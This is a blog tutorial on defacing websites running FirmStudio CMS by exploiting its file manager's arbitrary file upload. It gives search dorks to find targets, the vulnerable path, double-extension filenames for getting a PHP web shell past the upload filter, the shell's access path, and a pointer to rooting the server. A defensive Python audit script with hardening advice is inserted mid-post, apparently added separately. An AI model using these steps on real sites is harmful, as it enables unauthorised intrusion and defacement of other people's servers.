Wednesday, 01 June 2016

Deface Method: FirmStudio CMS (filemanager) Arbitrary File Upload

About 2,090 results (0.50 seconds)
Quite a few websites are vulnerable to this method, hehe..
No more small talk. Follow the tutorial carefully, let's check it out:
DORK :
- intext:"Website by FirmStudio"
- intext:"Website by FirmStudio" site:.de

EXPLOIT :
site.com/path/include/filemanager/dialog.php

SIGNS OF A VULNERABLE SITE :

HOW TO UPLOAD THE SHELL :
- rename your shell to:
1. shell.php.jpg
2. shell.php5
3. shell.php.png
4. shell.php.xxxjpg
5. Come up with your own variations; these extensions are meant to bypass the filter so that a file.php can be uploaded, because by default it only accepts .html .txt .gif files
- Once it is renamed, the file upload control is at the top left, next to the "Action" label
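
Seen from the defender's side, every name in the list above either contains a PHP-like segment or ends in an extension outside the allow-list, and Apache configurations that map `.php` with AddHandler can execute a file such as `name.php.jpg` as PHP. The following is an added example, not code from the original post or from FirmStudio; the function names, the list of PHP-like segments and the sample listing are assumptions. It audits an upload directory listing and applies a strict single-extension allow-list:

```python
import re
from pathlib import PurePosixPath

# Allow-list taken from the post: the file manager is meant to accept only these.
ALLOWED_EXTENSIONS = {"html", "txt", "gif"}

# Extension segments commonly mapped to the PHP handler (assumed list; match it
# to the AddHandler/AddType/FilesMatch rules of the server being audited).
PHP_SEGMENT = re.compile(r"^(php\d?|phtml|pht|phar)$", re.IGNORECASE)


def php_segments(filename: str) -> list[str]:
    """Return every dot-separated segment after the base name that looks like PHP."""
    name = PurePosixPath(filename.replace("\\", "/")).name
    return [seg for seg in name.split(".")[1:] if PHP_SEGMENT.match(seg)]


def is_acceptable_upload(filename: str) -> bool:
    """Strict check: exactly one extension, and it must be on the allow-list."""
    name = PurePosixPath(filename.replace("\\", "/")).name
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False  # no extension, several extensions, or a dotfile
    if not re.fullmatch(r"[A-Za-z0-9_-]+", parts[0]):
        return False  # keep base names to a conservative character set
    return parts[1].lower() in ALLOWED_EXTENSIONS


def audit(filenames):
    """Map each name that fails the strict check to the PHP segments found in it."""
    return {n: php_segments(n) for n in filenames if not is_acceptable_upload(n)}


# Constructed sample listing of an uploaded_files/ directory: the four names
# from the post plus two benign files.
SAMPLE_LISTING = [
    "shell.php.jpg", "shell.php5", "shell.php.png", "shell.php.xxxjpg",
    "brochure.html", "logo.gif",
]

if __name__ == "__main__":
    for name, segs in audit(SAMPLE_LISTING).items():
        print(f"REJECT {name!r}: php-like segments {segs}")
```

Filename checks alone are not sufficient: storing uploads outside the web root, or disabling script handlers for the upload directory, removes the execution path even when a name slips through.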

SHELL ACCESS :
site.com/uploaded_files/YOUR_SHELL_NAME
If you're lucky you can get a decent directory, but sometimes everything is Not Writable and the only writable one is /temp/. To get access to those folders, use a server rooting method, you can google it :)
For practice you can use these:

That's all, hope it's useful :)
Keep Exploiting
